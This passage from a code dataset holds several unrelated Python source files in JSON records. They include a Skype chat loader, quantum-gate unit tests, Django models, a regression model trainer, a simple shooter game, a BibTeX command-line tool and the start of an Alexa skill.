exist_ok=True)\n path = f\"{p}/{self.organization}.json\"\n else:\n p = f\"data/{self.type}/{self.region}/accounts/\"\n if not os.path.exists(p):\n os.makedirs(p, exist_ok=True)\n path = f\"{p}/{self.account_id}.json\"\n\n f = open(path, \"w\")\n f.write(json.dumps(self.param_kwargs, indent=4, default=str,))\n f.close()\n self.write_output(self.param_kwargs)\n","sub_path":"servicecatalog_puppet/workflow/portfolio/sharing_management/request_policy_task.py","file_name":"request_policy_task.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"605197150","text":"# -*- coding: utf-8 -*- \nfrom base_messenger import *\nfrom skpy import Skype\n\nclass SkypeMessenger(BaseMessenger):\n \n def __login__(self, login, password):\n try:\n self.sk = Skype(login, password)\n except:\n self.login_error(True)\n self.user_name = self.get_name_from_user(self.sk.user)\n\n def load_contacts(self):\n self.contacts = []\n ids = []\n # recent chats\n for row in self.sk.chats.recent():\n contact = self.sk.chats.chat(row)\n if hasattr(contact, \"topic\"):\n contact_id = contact.id\n ids.append(contact_id)\n avatar_link = \"\"\n self.contacts.append({\n \"name\": contact.topic,\n \"img\": avatar_link,\n \"id\": contact_id\n })\n else:\n self.contacts.append({\n \"name\": self.get_name_from_user(contact.user),\n \"img\": contact.user.avatar,\n \"id\": contact.id\n })\n # all contacts\n for contact in self.sk.contacts:\n avatar_link = contact.avatar\n if hasattr(contact, \"chat\"):\n contact_id = contact.chat.id\n if contact_id not in ids:\n self.contacts.append({\n \"name\": self.get_name_from_user(contact),\n \"img\": avatar_link,\n \"id\": contact_id\n })\n\n def load_messages(self, contact_id, date_from=None, date_to=None):\n self.messages = self.recursive_load_messages(contact_id, date_from)\n\n def recursive_load_messages(self, contact_id, date_from=None, date_to=None):\n chat = self.sk.chats[contact_id]\n messages = []\n try:\n l = chat.getMsgs()\n for row in l:\n message = {}\n message[\"content\"] = self.unicode_text(row.content)\n message[\"user_name\"] = self.get_name_from_user(row.user)\n message[\"date\"] = int(time.mktime(row.time.timetuple())) - self.timezone_offset * 60\n if message[\"date\"] < date_from:\n return messages\n messages.append(message)\n if len(messages) > 0:\n messages.extend(self.recursive_load_messages(contact_id, date_from, date_to))\n except:\n self.lh.capture_exception()\n return messages\n\n def get_name_from_user(self, user):\n \"\"\"Find the name.\"\"\"\n name = \"\"\n if user.name.first is not None:\n name += user.name.first + \" \"\n if user.name.last is not None:\n name += user.name.last + \" \"\n if name == \"\":\n name = user.id\n return self.unicode_text(name.strip())\n","sub_path":"server/messengers/skype_messenger.py","file_name":"skype_messenger.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117863333","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom tests.test_base import *\nfrom qgate.script import *\nfrom qgate.simulator.pyruntime import adjoint\nfrom qgate.model.decompose import decompose\nimport math\nimport cmath\nimport numpy as np\n\nclass TestExpBase(SimulatorTestBase) :\n\n @classmethod\n def setUpClass(cls):\n if cls is TestExpBase:\n raise unittest.SkipTest()\n super(TestExpBase, cls).setUpClass()\n\n def run_sim(self, circuit) :\n sim = self._run_sim(circuit, isolate_circuits = False)\n states = sim.qubits.get_states()\n return states\n\n def get_matrix(self, gate) :\n mat = gate.gate_type.pymat()\n if gate.adjoint :\n mat = adjoint(mat)\n return mat\n\n def gate_matrix_product(self, ops) :\n product = np.eye(2, dtype=np.float64)\n for gate in ops :\n mat = self.get_matrix(gate)\n product = np.matmul(product, mat)\n return product\n\n def test_expia(self) :\n qregs = new_qregs(4)\n circuit = [H(qreg) for qreg in qregs]\n states_h = self.run_sim(circuit)\n v = 1. / (math.sqrt(2) ** 4)\n self.assertTrue(np.allclose(states_h, v))\n\n circuit += [ Expia(math.pi / 8)(qregs[0]) ]\n states_hexp = self.run_sim(circuit)\n\n v = cmath.exp(1.j * math.pi / 8) / (math.sqrt(2) ** 4)\n self.assertTrue(np.allclose(states_hexp, v))\n\n def test_expiz(self) :\n qregs = new_qregs(4)\n circuit = [H(qreg) for qreg in qregs]\n states_h = self.run_sim(circuit)\n v = 1. / (math.sqrt(2) ** 4)\n self.assertTrue(np.allclose(states_h, v))\n\n circuit += [ Expiz(math.pi / 8)(qregs[0]) ]\n states_hexp = self.run_sim(circuit)\n\n v = cmath.exp(1.j * math.pi / 8) / (math.sqrt(2) ** 4)\n self.assertTrue(np.allclose(states_hexp[0::2], v))\n self.assertTrue(np.allclose(states_hexp[1::2], np.conjugate(v)))\n\n def test_exp_x(self) :\n theta = math.pi / 8.\n I = np.eye(2, dtype=np.complex128)\n x = np.array([[0, 1], [1, 0]], dtype=np.complex128) \n expix_ref = math.cos(theta) * I + 1.j * math.sin(theta) * x\n\n qreg = new_qreg()\n expix_dec = decompose(Expi(theta)(X(qreg)))\n expix_mat = self.gate_matrix_product(expix_dec)\n\n # print([gate.gate_type for gate in expix_dec])\n self.assertTrue(np.allclose(expix_ref, expix_mat))\n\n def test_exp_y(self) :\n theta = math.pi / 8.\n I = np.eye(2, dtype=np.complex128)\n y = np.array([[0, - 1.j], [1j, 0]], dtype=np.complex128) \n expiy_ref = math.cos(theta) * I + 1.j * math.sin(theta) * y\n\n qreg = new_qreg()\n expiy_dec = decompose(Expi(theta)(Y(qreg)))\n expiy_mat = self.gate_matrix_product(expiy_dec)\n\n self.assertTrue(np.allclose(expiy_ref, expiy_mat))\n\n def test_exp_z(self) :\n theta = math.pi / 8.\n i = np.eye(2, dtype=np.complex128)\n z = np.array([[1, 0], [0, -1]], dtype=np.complex128) \n expiz_ref = math.cos(theta) * i + 1.j * math.sin(theta) * z\n\n qreg = new_qreg()\n expiz_dec = decompose(Expi(theta)(Z(qreg)))\n expiz_mat = self.gate_matrix_product(expiz_dec)\n\n self.assertTrue(np.allclose(expiz_ref, expiz_mat))\n\n def test_exp_id(self) :\n theta = math.pi / 8.\n i = np.eye(2, dtype=np.complex128)\n expii_ref = cmath.exp(theta * 1.j) * i\n\n qreg = new_qreg()\n expii_dec = decompose(Expi(theta)(I(qreg)))\n expii_mat = self.gate_matrix_product(expii_dec)\n \n #print([gate.gate_type for gate in expii_dec])\n #print(expii_ref) print(expii_mat)\n self.assertTrue(np.allclose(expii_ref, expii_mat))\n\n def test_exp_xx(self) :\n theta = math.pi / 8.\n i = np.eye(2, dtype=np.complex128)\n expii_ref = cmath.exp(theta * 1.j) * i\n\n qreg = new_qreg()\n expii_dec = decompose(Expi(theta)(X(qreg), X(qreg)))\n expii_mat = self.gate_matrix_product(expii_dec)\n \n #print([gate.gate_type for gate in expii_dec])\n #print(expii_ref) print(expii_mat)\n self.assertTrue(np.allclose(expii_ref, expii_mat))\n \nimport sys\nthis = sys.modules[__name__]\ncreateTestCases(this, 'TestExp', TestExpBase)\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_exp_gate.py","file_name":"test_exp_gate.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"163029985","text":"from django.db import models\nfrom django.contrib.auth.models import User\nimport datetime as dt\nfrom django.db.models import Q\n\n\n# Create your models here.\nclass Profile(models.Model):\n username = models.ForeignKey(User, on_delete=models.CASCADE, related_name='profile')\n profile_pic = models.ImageField(upload_to='images/', default='default.png')\n bio = models.TextField(max_length=500, default=\"\", blank=True)\n name = models.CharField(blank=True, max_length=120)\n country = models.ForeignKey('Countries',on_delete=models.CASCADE)\n email = models.EmailField(max_length=100, blank=True)\n\n def __str__(self):\n return f'{self.username} profile'\n\n\nclass Countries(models.Model):\n countries = models.CharField(max_length=100)\n\n def __str__(self):\n return self.countries\n\n class Meta:\n ordering = ['countries']\n\n\n def save_country(self):\n self.save()\n\n @classmethod\n def delete_country(cls,countries):\n cls.objects.filter(countries=countries).delete()\n\n\nclass Post(models.Model):\n title = models.CharField(max_length=150)\n photo = models.ImageField(upload_to='landingpage/')\n link = models.URLField(max_length=255)\n description = models.TextField(max_length=255)\n technologies = models.ManyToManyField('Technologies', max_length=255)\n username = models.ForeignKey(User, on_delete=models.CASCADE, related_name=\"posts\")\n date = models.DateTimeField(auto_now_add=True, blank=True)\n\n def __str__(self):\n return self.title\n \n @classmethod\n def all_posts(cls):\n return cls.objects.all()\n \n @classmethod\n def search_post(cls,search_term):\n posts = cls.objects.filter(Q(username__username=search_term) | Q(title__icontains=search_term))\n return posts\n\n def save_post(self):\n self.save()\n\n def delete_post(self):\n self.delete()\n\n\nclass Technologies(models.Model):\n technologies = models.CharField(max_length=100)\n\n def __str__(self):\n return self.technologies\n\n def save_technology(self):\n self.save()\n\n @classmethod\n def delete_technology(cls,technologies):\n cls.objects.filter(technologies=technologies).delete()\n\nclass Rating(models.Model):\n rating = (\n (1, '1'),\n (2, '2'),\n (3, '3'),\n (4, '4'),\n (5, '5'),\n (6, '6'),\n (7, '7'),\n (8, '8'),\n (9, '9'),\n (10, '10'),\n )\n design = models.IntegerField(choices=rating,blank=True,default=0)\n usability = models.IntegerField(choices=rating,blank=True,default=0)\n creativity = models.IntegerField(choices=rating,blank=True,default=0)\n content = models.IntegerField(choices=rating,blank=True,default=0)\n overall_score = models.IntegerField(blank=True,default=0)\n post = models.ForeignKey(Post,on_delete=models.CASCADE)\n profile = models.ForeignKey(Profile,on_delete=models.CASCADE)\n\n def save_rating(self):\n self.save()\n\n def __str__(self):\n return f'{self.post} Rating'\n\n","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"442794479","text":"# _*_ coding: utf-8 _*_\n# @Time : 2019/5/11 22:10\n# @Author : Ole211\n# @Site : \n# @File : views.py \n# @Software : PyCharm\nfrom django.shortcuts import render\nfrom django.db import connection\n\n\ndef index(request):\n cur = connection.cursor()\n # cur.execute(\"insert into book(id, name, author) values(null, '西游记', '施耐庵')\")\n cur.execute(\"select * from book\")\n rows = cur.fetchall()\n for row in rows:\n print(row)\n return render(request, 'index.html')","sub_path":"django-tutorial/chapter04/db_operation_demo/db_operation_demo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"203277158","text":"import numpy as np\r\nimport pandas as pd\r\nimport math\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import MaxAbsScaler\r\nfrom mpl_toolkits import mplot3d\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import mean_squared_error\r\ndata=pd.read_csv('ND2016.csv', sep=',',header=0)\r\ndata = np.array(data)\r\ntrain = data\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.ensemble import RandomForestRegressor\r\n\r\nprint(len(train))\r\n\r\ntrain=np.array(train)\r\n\r\ny_train=np.zeros(len(train))\r\n\r\n\r\nfor i in range(len(train)):\r\n y_train[i]=train[i][2]\r\ntrain = np.delete(train, 2, axis=1)\r\n\r\nimport pickle \r\n\r\nreg = SVR(gamma = 0.0005, kernel = 'rbf', C=500000, verbose=True).fit(train, y_train)\r\n\r\nn=10\r\nreg_error = {}\r\n\r\ny_pred = reg.predict(train)\r\nfor i in range(n):\r\n error = y_train - y_pred\r\n reg_error[i] = RandomForestRegressor(max_depth = 30, n_estimators = 500).fit(train, error)\r\n error_pred = reg_error[i].predict(train)\r\n y_pred = y_pred + error_pred\r\n\r\n# save all 10 models to joblib\r\n\r\npickle.dump(reg, open('base_model.sav', 'wb'))\r\npickle.dump(reg_error[0], open('error_model_1.sav','wb'))\r\npickle.dump(reg_error[1], open('error_model_2.sav','wb'))\r\npickle.dump(reg_error[2], open('error_model_3.sav','wb'))\r\npickle.dump(reg_error[3], open('error_model_4.sav','wb'))\r\npickle.dump(reg_error[4], open('error_model_5.sav','wb'))\r\npickle.dump(reg_error[5], open('error_model_6.sav','wb'))\r\npickle.dump(reg_error[6], open('error_model_7.sav','wb'))\r\npickle.dump(reg_error[7], open('error_model_8.sav','wb'))\r\npickle.dump(reg_error[8], open('error_model_9.sav','wb'))\r\npickle.dump(reg_error[9], open('error_model_10.sav','wb'))\r\nprint(\"MODELS BUILT AND SAVED\")\r\n\r\n\r\n\r\n","sub_path":"model_builder.py","file_name":"model_builder.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"471254246","text":"from gamelib import *\r\n\r\ngame = Game(1024,768,\"Billy Bob And The Munster Uprising\")\r\n#Game graphics\r\n\r\n#Background\r\nbk = Animation(\"Background.jpg\",2,game,4096/2,768)\r\ngame.setBackground(bk)\r\n\r\nplay = Image(\"play.png\",game)\r\nplay.moveTo(1024/2,600)\r\n\r\nhtp = Image(\"How-To-Play.png\",game)\r\nhtp.moveTo(play.x,play.y + 100)\r\n\r\nTitle1 = Image(\"Billy-Bob-and-The-.png\",game)\r\nTitle1.moveTo(play.x,play.y - 400)\r\nTitle2 = Image(\"Munster-Uprising.png\",game)\r\nTitle2.moveTo(play.x,play.y - 300)\r\n\r\nBack = Image(\"Back.png\",game)\r\nBack.moveTo(100,700)\r\n\r\nNext = Image(\"Next.png\",game)\r\nNext.moveTo(1024/2 + 400,768/2 + 350)\r\n\r\n#Sound\r\nShoot = Sound(\"shoot.wav\",1)\r\n\r\n#Hero\r\nBilly = Animation(\"Billy_Right.png\",4,game,264/4,96)\r\nBilly.moveTo(20,400)\r\nBilly.resizeBy(20)\r\n\r\n#Ground\r\nground = Image(\"ground.jpg\",game)\r\nground.moveTo(Billy.x,660)\r\n\r\n\r\n#Bullet\r\nbullet = Image(\"bullet.png\",game,use_alpha = False)\r\nbullet.resizeBy(-85)\r\nbullet.rotateBy(90,\"right\")\r\nbullet.visible = False\r\n\r\n\r\n\r\n#Monsters\r\nMaggots = []\r\nfor index in range(30):\r\n Maggots.append(Animation(\"cave-maggot-giant.png\",10,game,580/10,44,use_alpha = False))\r\n Maggots[index].resizeBy(50)\r\nfor index in range(30):\r\n x = randint(1024,5000)\r\n Maggots[index].moveTo(x,ground.y - 40)\r\n\r\nZombies = []\r\nfor index in range(30):\r\n Zombies.append(Animation(\"zombie_frame.png\",4,game,136/4,96,use_alpha = False))\r\n Zombies[index].resizeBy(50)\r\nfor index in range(30):\r\n x = randint(1024,5000)\r\n Zombies[index].moveTo(x,ground.y - 75)\r\n\r\nGhosts = []\r\nfor index in range(30):\r\n Ghosts.append(Animation(\"ghost_frame.png\",5,game,246/5,96,use_alpha = False))\r\n Ghosts[index].resizeBy(50)\r\nfor index in range(30):\r\n x = randint(1024,5000)\r\n Ghosts[index].moveTo(x,ground.y - 300)\r\n\r\n \r\n#Title Screen\r\nHowToPlay = False\r\nwhile not game.over and HowToPlay == False:\r\n game.processInput()\r\n \r\n game.scrollBackground(\"left\",2)\r\n Title1.draw()\r\n Title2.draw()\r\n\r\n\r\n ground.draw()\r\n play.draw()\r\n \r\n if play.collidedWith(mouse) and mouse.LeftClick:\r\n game.over = True\r\n \r\n game.update(30)\r\ngame.over = False\r\n#How To Play\r\nwhile not game.over:\r\n game.processInput()\r\n\r\n game.scrollBackground(\"left\",2)\r\n \r\n ground.draw()\r\n\r\n game.drawText(\"A = Move Left\",1024/2 - 100,768/2 )\r\n game.drawText(\"D = Move Right\",1024/2 - 100,768/2 + 50)\r\n game.drawText(\"Left Click = Shoot\",1024/2 - 100,768/2 + 100)\r\n\r\n Next.draw()\r\n\r\n if Next.collidedWith(mouse) and mouse.LeftClick:\r\n game.over = True\r\n \r\n game.update(30)\r\ngame.over = False\r\n\r\n#Wave 1\r\nwave1complete = 0\r\nwhile not game.over:\r\n game.processInput()\r\n\r\n landed = False\r\n\r\n game.scrollBackground(\"left\",2)\r\n \r\n ground.draw()\r\n bullet.move()\r\n Billy.draw()\r\n Billy.stop()\r\n \r\n if Billy.collidedWith(ground,\"rectangle\"):\r\n landed = True\r\n\r\n for times in range(100):\r\n ground.moveTo(Billy.x,660)\r\n \r\n for index in range(30): \r\n if Maggots[index].x <= Billy.x:\r\n Maggots[index].setSpeed(3,270)\r\n Maggots[index].move() \r\n if Maggots[index].x >= Billy.x:\r\n Maggots[index].setSpeed(3,90)\r\n Maggots[index].move()\r\n \r\n if Zombies[index].x <= Billy.x:\r\n Zombies[index].setSpeed(2,270)\r\n Zombies[index].move()\r\n if Zombies[index].x >= Billy.x:\r\n Zombies[index].setSpeed(3,90)\r\n Zombies[index].move()\r\n \r\n Ghosts[index].moveTowards(Billy,5)\r\n\r\n\r\n #Collision w/ Billy\r\n if Maggots[index].collidedWith(Billy):\r\n Billy.health -= 10\r\n Maggots[index].visible = False\r\n wave1complete += 1\r\n if Zombies[index].collidedWith(Billy):\r\n Billy.health -= 10\r\n Zombies[index].visible = False\r\n wave1complete += 1\r\n if Ghosts[index].collidedWith(Billy):\r\n Billy.health -= 10\r\n Ghosts[index].visible = False\r\n wave1complete += 1\r\n\r\n #Collision w/ bullet\r\n if Maggots[index].collidedWith(bullet):\r\n Maggots[index].visible = False\r\n bullet.visible = False\r\n wave1complete += 1\r\n if Zombies[index].collidedWith(bullet):\r\n Zombies[index].visible = False\r\n bullet.visible = False\r\n wave1complete += 1\r\n if Ghosts[index].collidedWith(bullet):\r\n Ghosts[index].visible = False\r\n bullet.visible = False\r\n wave1complete += 1\r\n\r\n if bullet.isOffScreen():\r\n bullet.visible = False\r\n \r\n \r\n if Billy.health == 0:\r\n game.over = True\r\n\r\n \r\n ##Controls\r\n if landed == False:\r\n Billy.y += 3 \r\n if keys.Pressed[K_d]:\r\n Billy.x += 10\r\n Billy.nextFrame()\r\n if keys.Pressed[K_a]:\r\n Billy.x -= 10 \r\n Billy.prevFrame()\r\n if keys.Pressed[K_SPACE]:\r\n Billy.y -= 20\r\n landed == False\r\n if mouse.LeftClick:\r\n Shoot.play()\r\n bullet.visible = True\r\n bullet.moveTo(Billy.x,Billy.y)\r\n bullet.moveTowards(mouse,100)\r\n\r\n\r\n game.drawText(\"Health: \" + str(Billy.health),Billy.x - 50,Billy.y - 100)\r\n game.update(30)\r\n\r\n if wave1complete == 90:\r\n game.over = True\r\ngame.quit()\r\n","sub_path":"projectt.py","file_name":"projectt.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"296021542","text":"import os\nimport argparse\nimport json\nimport collections\nfrom datetime import datetime\n\nimport logging\n\nfrom train import char_lstm_classifier, cnn_classifier\n\ndef init_logger(path:str):\n if not os.path.exists(path):\n os.makedirs(path)\n logger = logging.getLogger()\n logger.handlers = []\n logger.setLevel(logging.DEBUG)\n debug_fh = logging.FileHandler(os.path.join(path, \"debug.log\"))\n debug_fh.setLevel(logging.DEBUG)\n\n info_fh = logging.FileHandler(os.path.join(path, \"info.log\"))\n info_fh.setLevel(logging.INFO)\n\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n\n info_formatter = logging.Formatter('%(asctime)s | %(levelname)-8s | %(message)s')\n debug_formatter = logging.Formatter('%(asctime)s | %(levelname)-8s | %(message)s | %(lineno)d:%(funcName)s')\n\n ch.setFormatter(info_formatter)\n info_fh.setFormatter(info_formatter)\n debug_fh.setFormatter(debug_formatter)\n\n logger.addHandler(ch)\n logger.addHandler(debug_fh)\n logger.addHandler(info_fh)\n\n return logger\n\n\ndef train_model(args, builder_class):\n hparams_path = args.hparams\n\n with open(hparams_path, \"r\") as f_handle:\n hparams_dict = json.load(f_handle)\n\n timestamp = datetime.now().strftime('%Y%m%d-%H%M%S')\n root_dir = os.path.join(hparams_dict[\"root_dir\"], \"%s/\" % timestamp)\n\n logger = init_logger(root_dir)\n logger.info(\"Loaded hyper-parameter configuration from file: %s\" % hparams_path)\n logger.info(\"Hyper-parameters: %s\" % str(hparams_dict))\n hparams_dict[\"root_dir\"] = root_dir\n\n hparams = collections.namedtuple(\"HParams\", sorted(hparams_dict.keys()))(**hparams_dict)\n\n with open(os.path.join(root_dir, \"hparams.json\"), \"w\") as f_handle:\n json.dump(hparams._asdict(), f_handle, indent=2)\n\n # Build graph\n model = builder_class(hparams, args.data)\n model.train()\n\n\ndef load_and_evaluate(args, builder_class):\n hparams_path = args.hparams\n\n with open(hparams_path, \"r\") as f_handle:\n hparams_dict = json.load(f_handle)\n\n timestamp = datetime.now().strftime('%Y%m%d-%H%M%S')\n root_dir = os.path.join(hparams_dict[\"root_dir\"], \"%s/\" % timestamp)\n\n logger = init_logger(root_dir)\n logger.info(\"Loaded hyper-parameter configuration from file: %s\" % hparams_path)\n logger.info(\"Hyper-parameters: %s\" % str(hparams_dict))\n hparams_dict[\"root_dir\"] = root_dir\n\n hparams = collections.namedtuple(\"HParams\", sorted(hparams_dict.keys()))(**hparams_dict)\n\n with open(os.path.join(root_dir, \"hparams.json\"), \"w\") as f_handle:\n json.dump(hparams._asdict(), f_handle, indent=2)\n\n # Build graph\n model = builder_class(hparams, args.data)\n # main에서 \"load_and_evaluate(args, char_lstm_classifier.TextClassifier)\" 이렇게 실행\n # char_lstm_classifier.py에는 TextClassifier라는 이름의 클래스 구현\n # \"char_lstm_classifier.TextClassifier(hparams, args.data)를 실행함으로서\n # model이라는 이름의 TextClassifier 객체를 생성하고, 아규먼트를 입력해줌.\n\n model.evaluate(args.predict)\n # 생성된 model 객체를 실행.\n\n\nif __name__ == \"__main__\":\n arg_parser = argparse.ArgumentParser(description=\"Named Entity Tagger.\")\n arg_parser.add_argument(\"--hparams\", dest=\"hparams\", required=True,\n help=\"Path to the file that contains hyper-parameter settings. (JSON format)\")\n arg_parser.add_argument(\"--data\", dest=\"data\", type=str, required=True,\n help=\"Directory that contains dataset files.\")\n arg_parser.add_argument(\"--evaluate\", dest=\"evaluate\", type=str, default=None,\n help=\"Path to the saved model.\")\n args = arg_parser.parse_args()\n\n if args.evaluate is not None:\n # load_and_evaluate(args, cnn_classifier.TextClassifier)\n load_and_evaluate(args, char_lstm_classifier.TextClassifier)\n else:\n # train_model(args, cnn_classifier.TextClassifier)\n train_model(args, char_lstm_classifier.TextClassifier)\n\n\n# tensorflow.python.framework.errors_impl.InvalidArgumentError: logits and labels must have the same first dimension, got logits shape [16,9] and labels shape [331]\n# logits shape [16,9] and labels shape [331]","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"303021741","text":"import argparse\n\nfrom .bib import BibFile\nfrom .common import boolize\nfrom .parser import BibParser\n\n\nACTIONS = ['analyse', 'merge']\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--conflict_shortname', '-n', type=str, default='ignore')\nparser.add_argument('--conflict_shortname_compare', '-c', type=str, default=None)\nparser.add_argument('--allow_entry_detect', '-d', type=boolize, default=False)\nparser.add_argument('--strict_entry_required', '-r', type=boolize, default=False)\nparser.add_argument('--strict_entry_optional', '-o', type=boolize, default=False)\nparser.add_argument('--file', '-f', required=True, nargs='+')\nparser.add_argument('--action', '-a', type=str, default='analyse')\nparser.add_argument('--export', '-e', type=str, default=None)\nparser.add_argument('--merge_conflict_shortname', '-mn', type=str, default='ignore')\nparser.add_argument('--merge_conflict_shortname_compare', '-mc', type=str, default=None)\nparser.add_argument('--selected_attrs', '-t', nargs='*', default=None)\n\n\ndef analyse():\n args = parser.parse_args()\n bib_parser = BibParser.from_args(args)\n\n for file in args.file:\n bib_file = BibFile(file, parser=bib_parser)\n print('Total', len(bib_file.refs.refs), 'references in', file)\n\n\ndef merge():\n args = parser.parse_args()\n bib_parser = BibParser.from_args(args)\n\n assert args.export\n bib_files = [BibFile(file, parser=bib_parser) for file in args.file]\n bib_file = BibFile.merge(\n *bib_files,\n conflict_shortname=args.merge_conflict_shortname,\n conflict_shortname_compare=args.merge_conflict_shortname_compare,\n )\n selected_attrs = args.selected_attrs\n bib_file.export(\n to=args.export,\n selected_attrs=selected_attrs,\n )\n\n print('Successfully merged to', args.export)\n\n\ndef main():\n args = parser.parse_args()\n\n assert args.action in ACTIONS\n\n if args.action == 'analyse':\n analyse()\n\n elif args.action == 'merge':\n merge()\n\n else:\n raise ValueError('Undefined action', args.action)\n","sub_path":"BibParser/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"225106590","text":"# coding:utf-8\r\n\r\nfrom run_classifier import ColaProcessor\r\nimport tokenization\r\nfrom run_classifier import file_based_convert_examples_to_features\r\nimport random\r\n\r\n\r\ndata_name = \"AMPScan\"\r\ninput_root = \"./pre_model_1kmer_600w/tsv_data/\"\r\noutput_root = \"./pre_model_1kmer_600w/tfrecord/\"\r\nvocab_file = \"./vocab/vocab_1kmer.txt\"\r\n\r\n\r\ndef rand_data(input_file, out_file):\r\n with open(input_file) as f:\r\n lines = f.readlines()\r\n random.shuffle(lines)\r\n print(lines)\r\n with open(out_file, \"w\") as f:\r\n for line in lines:\r\n f.write(line)\r\n\r\n\r\nrand_data(input_root + data_name + \"/sorted_train.tsv\",\r\n input_root + data_name + \"/train.tsv\")\r\n\r\nrand_data(input_root + data_name + \"/sorted_dev.tsv\",\r\n input_root + data_name + \"/dev.tsv\")\r\n\r\n\r\nprocessor = ColaProcessor()\r\nlabel_list = processor.get_labels()\r\nexamples = processor.get_dev_examples(input_root + data_name + \"/\")\r\ntrain_file = output_root + data_name + \"/dev.tf_record\"\r\ntokenizer = tokenization.FullTokenizer(\r\n vocab_file=vocab_file, do_lower_case=True)\r\nfile_based_convert_examples_to_features(\r\n examples, label_list, 128, tokenizer, train_file)\r\n\r\nexamples = processor.get_train_examples(input_root + data_name + \"/\")\r\ntrain_file = output_root + data_name + \"/train.tf_record\"\r\ntokenizer = tokenization.FullTokenizer(\r\n vocab_file=vocab_file, do_lower_case=True)\r\nfile_based_convert_examples_to_features(\r\n examples, label_list, 128, tokenizer, train_file)\r\n","sub_path":"ljy_tsv2record.py","file_name":"ljy_tsv2record.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"238713770","text":"class Solution:\n '''\n 执行用时 : 48 ms, 在所有 Python3 提交中击败了75.54%的用户\n 内存消耗 : 13.8 MB, 在所有 Python3 提交中击败了5.66%的用户\n\n 方法描述:指针(current)从(0,0)开始,首先向右,\n 一旦发现超过了矩阵边界或者已经被访问过,按照顺时针方向变换方向,继续前进。\n '''\n def spiralOrder(self, matrix):\n m = len(matrix)\n if m == 0: return []\n n = len(matrix[0])\n judge = [[0 for i in range(n)] for j in range(m)]\n direction = [(0,1),(1,0),(0,-1),(-1,0)]\n direction_ind = 0\n current = (0,0)\n res = list()\n c = 0\n while c=m or y >= n or x < 0 or y < 0:\n direction_ind += 1\n ind = direction_ind % 4\n x = current[0]+direction[ind][0]\n y = current[1]+direction[ind][1]\n current = (x,y)\n elif judge[x][y]:\n direction_ind += 1\n ind = direction_ind % 4\n x = current[0]+direction[ind][0]\n y = current[1]+direction[ind][1]\n current = (x,y)\n else:\n current = (x,y)\n return res\n\n def standard_spiralOrder(self,matrix):\n if not matrix: return []\n R, C = len(matrix), len(matrix[0])\n seen = [[False] * C for _ in matrix]\n ans = []\n dr = [0, 1, 0, -1]\n dc = [1, 0, -1, 0]\n r = c = di = 0\n for _ in range(R * C):\n ans.append(matrix[r][c])\n seen[r][c] = True\n cr, cc = r + dr[di], c + dc[di]\n if 0 <= cr < R and 0 <= cc < C and not seen[cr][cc]:\n r, c = cr, cc\n else:\n di = (di + 1) % 4\n r, c = r + dr[di], c + dc[di]\n return ans\n","sub_path":"Problems/0054-SpiralOrder.py","file_name":"0054-SpiralOrder.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"613507931","text":"import urllib2\nimport json\nimport datetime\nfrom __future__ import print_function\n\n\ndef lambda_handler(event, context):\n \"\"\" \n Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n if event['request']['type'] == \"LaunchRequest\":\n return get_welcome_response()\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return handle_session_end_request()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"SnowDayChancesIntent\":\n return get_chances_of_school(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n# --------------- Functions that control the skill's behavior ------------------\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome to Snow Day Assistant\"\n speech_output = \"You can ask for the likelyhood of a snowday by saying, \" \\\n \"Snow Day Assistant, what are the chances of school tomorrow?\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"You can ask, what are the chances of school tomorrow?\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Thanks for using Snow Day 